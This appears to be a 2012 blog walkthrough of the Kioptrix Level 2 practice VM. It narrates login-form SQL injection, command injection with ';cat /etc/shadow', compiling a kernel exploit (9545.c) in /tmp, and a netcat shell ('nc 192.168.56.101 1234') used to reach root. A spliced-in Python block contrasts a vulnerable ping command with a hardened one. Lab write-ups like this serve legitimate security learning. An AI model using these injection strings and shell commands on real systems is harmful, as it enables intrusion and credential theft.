Saturday, November 17, 2012

Lab 5 Kioptrix Level 2



Information Gathering





Service Enumeration

Based on the nmap screenshot, I found several open ports: 22 (ssh), 80 (http), 111 (rpcbind), 443 (ssl/http), 631 (ipp), and 3306 (mysql).

Vulnerability Assessment

Here I tried injecting the login form, and it worked.


I was redirected straight to the administrative web console.

Exploit

So I tried the command execution attack vector.
Here I tried to view the kernel information.

Now I know that the server runs kernel 2.6.9, so I tried to view /etc/passwd and /etc/shadow, but ;cat /etc/shadow did not work.
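The ";" command execution pattern used above, shown as a vulnerable handler beside a hardened one. This is an added example, not code from the Kioptrix VM or from this write-up; the "host to ping" field and the ping command are assumptions, and the sample input only reuses the write-up's own ;cat shape.

```python
import re
import shlex
from typing import List

# Allow-list for what a "host to ping" field should contain: a dotted-quad IPv4
# address or a DNS hostname. Anything else is rejected before a command is built.
HOST_RE = re.compile(
    r"^(?:\d{1,3}(?:\.\d{1,3}){3}"                              # IPv4
    r"|[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"           # first label
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*)$"   # more labels
)

def vulnerable_command(host: str) -> str:
    """Vulnerable pattern (assumed for the web console): the submitted value is
    concatenated into one shell string, so a ';' ends the ping command and
    whatever follows it is run as a second command."""
    return "ping -c 3 " + host

def shell_commands(command_line: str) -> List[List[str]]:
    """Tokenize a command line the way a POSIX shell would, without executing
    it, and split at ';' to show how many commands the string really carries."""
    lexer = shlex.shlex(command_line, posix=True, punctuation_chars=True)
    commands: List[List[str]] = []
    current: List[str] = []
    for tok in lexer:
        if tok == ";":
            commands.append(current)
            current = []
        else:
            current.append(tok)
    if current:
        commands.append(current)
    return commands

def is_valid_host(host: str) -> bool:
    """Allow-list check; shell metacharacters such as ';' never pass it."""
    return HOST_RE.fullmatch(host) is not None

def safe_command(host: str) -> List[str]:
    """Hardened form: validate first, then build argv as a list for
    subprocess.run(argv) with shell=False, so no shell ever parses the value."""
    if not is_valid_host(host):
        raise ValueError(f"rejected host value: {host!r}")
    return ["ping", "-c", "3", host]

if __name__ == "__main__":
    # Constructed input with the same shape as the write-up's ";cat ..." attempt.
    injected = "192.168.56.101;cat /etc/passwd"
    print(shell_commands(vulnerable_command(injected)))  # two commands, not one
    print(is_valid_host(injected), safe_command("192.168.56.101"))
```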



Then I searched for a local exploit for kernel 2.6.x and copied it to /var/www/.





Then I downloaded it to /tmp on the target machine and compiled it.

We can see that the exploit (9545.c) compiled successfully, so I executed it.

But I was still running as the apache user. At this point I needed a way into the server so that I could run the exploit from a shell inside it, so I started netcat listening on port 1234.


Then I connected via netcat by typing nc 192.168.56.101 1234 and executed the exploit (rooting).



We can see that the exploitation succeeded, and I am root now.

Alhamdulillah.... :D
